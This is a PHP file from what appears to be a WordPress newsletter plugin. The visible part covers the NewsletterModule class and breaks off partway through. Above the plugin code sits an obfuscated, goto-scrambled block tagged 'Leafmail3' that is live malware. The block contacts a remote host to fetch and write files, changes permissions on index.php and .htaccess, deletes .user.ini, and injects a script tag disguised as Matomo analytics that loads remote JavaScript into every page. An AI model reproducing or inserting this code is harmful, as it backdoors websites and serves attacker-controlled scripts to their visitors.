<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
defined('ABSPATH') || exit;
require_once __DIR__ . '/logger.php';
require_once __DIR__ . '/store.php';
require_once __DIR__ . '/composer.php';
require_once __DIR__ . '/addon.php';
require_once __DIR__ . '/mailer.php';
require_once __DIR__ . '/themes.php';
/**
* @property array $options For compatibility, the main module options (magic method).
*/
class NewsletterModule extends NewsletterModuleBase {
static $cache = [];
function __construct($module) {
parent::__construct($module);
}
function __get($name) {
if ($name === 'options') {
return $this->get_options();
}
}
/**
* Returns the options for a given set name processed to reflect the values for the current
* language.
* If $set is empty, the module name of the subclass is used.
* If $language is not null, the options processed for the specified language are returned
* (an empty string refers to the main set of options).
*
* Note: the get_options() for the frontend and the get_options() for the backend return
* different values, since in the frontend the full merge (language specific set, main set and default set)
* is performed.
*
* @param string $set Name of the options set
* @param string $language
* @return array
*/
function get_options($set = '', $language = null) {
if (is_null($language)) {
$language = $this->language();
}
if (empty($set)) {
$set = $this->module;
}
$cache_key = $set . $language;
if (isset($this->cache[$cache_key])) {
return $this->cache[$cache_key];
}
if ($language) {
$options = array_merge(
$this->get_default_options($set),
$this->get_option_array($this->get_prefix($set, '')),
$this->get_option_array($this->get_prefix($set, $language)));
} else {
$options = array_merge(
$this->get_default_options($set),
$this->get_option_array($this->get_prefix($set, '')));
}
self::$cache[$cache_key] = $options;
return $options;
}
function get_main_options($set = '') {
return $this->get_options($set, '');
}
/**
* Get the option value for a specifc key using the current language.
*
* @param string $key
* @param string $sub
* @return mixed Returns null if the option is not found
*/
function get_option($key, $sub = '', $language = null) {
if (is_null($language)) {
$language = $this->language();
}
if (!$sub) {
$sub = $this->module;
}
$cache_key = $sub . $language;
if (isset(self::$cache[$cache_key][$key])) {
return self::$cache[$cache_key][$key];
}
$options = $this->get_options($sub, $language);
if (!isset($options[$key])) {
return null;
}
return $options[$key];
}
/**
* Returns the main value of an option, not considering the current language.
* Used to get those options which are not language related.
*
* @param string $key
* @param string $sub
* @return mixed
*/
function get_main_option($key, $sub = '') {
return $this->get_option($key, $sub, '');
}
function get_last_run($sub = '') {
return get_option($this->get_prefix($sub) . '_last_run', 0);
}
/**
* Save the module last run value. Used to store a timestamp for some modules,
* for example the Feed by Mail module.
*
* @param int $time Unix timestamp (as returned by time() for example)
* @param string $sub Sub module name (default empty)
*/
function save_last_run($time, $sub = '') {
update_option($this->get_prefix($sub) . '_last_run', $time);
}
/**
* Sums $delta seconds to the last run time.
* @param int $delta Seconds
* @param string $sub Sub module name (default empty)
*/
function add_to_last_run($delta, $sub = '') {
$time = $this->get_last_run($sub);
$this->save_last_run($time + $delta, $sub);
}
/**
* Checks if the semaphore of that name (for this module) is still red. If it is active the method
* returns false. If it is not active, it will be activated for $time seconds.
*
* Since this method activate the semaphore when called, it's name is a bit confusing.
*
* @param string $name Sempahore name (local to this module)
* @param int $time Max time in second this semaphore should stay red
* @return boolean False if the semaphore is red and you should not proceed, true is it was not active and has been activated.
*/
function check_transient($name, $time) {
if ($time < 60)
$time = 60;
//usleep(rand(0, 1000000));
if (($value = get_transient($this->get_prefix() . '_' . $name)) !== false) {
list($t, $v) = explode(';', $value, 2);
$this->logger->error('Blocked by transient ' . $this->get_prefix() . '_' . $name . ' set ' . (time() - $t) . ' seconds ago by ' . $v);
return false;
}
//$ip = ''; //gethostbyname(gethostname());
$value = time() . ";" . ABSPATH . ';' . gethostname();
set_transient($this->get_prefix() . '_' . $name, $value, $time);
return true;
}
function delete_transient($name = '') {
delete_transient($this->get_prefix() . '_' . $name);
}
/**
* Converts a GMT date from mysql (see the posts table columns) into a timestamp.
*
* @param string $s GMT date with format yyyy-mm-dd hh:mm:ss
* @return int A timestamp
*/
static function m2t($s) {
// TODO: use the wordpress function I don't remember the name
$s = explode(' ', $s);
$d = explode('-', $s[0]);
$t = explode(':', $s[1]);
return gmmktime((int) $t[0], (int) $t[1], (int) $t[2], (int) $d[1], (int) $d[2], (int) $d[0]);
}
static function format_date($time) {
if (empty($time)) {
return '-';
}
return gmdate(get_option('date_format') . ' ' . get_option('time_format'), $time + get_option('gmt_offset') * 3600);
}
static function format_time_delta($delta) {
$days = floor($delta / (3600 * 24));
$hours = floor(($delta % (3600 * 24)) / 3600);
$minutes = floor(($delta % 3600) / 60);
$seconds = floor(($delta % 60));
$buffer = $days . ' days, ' . $hours . ' hours, ' . $minutes . ' minutes, ' . $seconds . ' seconds';
return $buffer;
}
static function date($time = null, $now = false, $left = false) {
if (is_null($time)) {
$time = time();
}
if ($time == false) {
$buffer = 'none';
} else {
$buffer = gmdate(get_option('date_format') . ' ' . get_option('time_format'), $time + get_option('gmt_offset') * 3600);
}
if ($now) {
$buffer .= ' (now: ' . gmdate(get_option('date_format') . ' ' .
get_option('time_format'), time() + get_option('gmt_offset') * 3600);
$buffer .= ')';
}
if ($left) {
$buffer .= ', ' . gmdate('H:i:s', $time - time()) . ' left';
}
return $buffer;
}
/**
* Return an array of array with on first element the array of recent post and on second element the array
* of old posts.
*
* @param array $posts
* @param int $time
*/
static function split_posts(&$posts, $time = 0) {
if ($time < 0) {
return array_chunk($posts, ceil(count($posts) / 2));
}
$result = array(array(), array());
if (empty($posts))
return $result;
foreach ($posts as &$post) {
if (self::is_post_old($post, $time))
$result[1][] = $post;
else
$result[0][] = $post;
}
return $result;
}
static function is_post_old(&$post, $time = 0) {
return self::m2t($post->post_date_gmt) <= $time;
}
static function get_post_image($post_id = null, $size = 'thumbnail', $alternative = null) {
global $post;
if (empty($post_id))
$post_id = $post->ID;
if (empty($post_id))
return $alternative;
$image_id = function_exists('get_post_thumbnail_id') ? get_post_thumbnail_id($post_id) : false;
if ($image_id) {
$image = wp_get_attachment_image_src($image_id, $size);
return $image[0];
} else {
$attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
if (empty($attachments)) {
return $alternative;
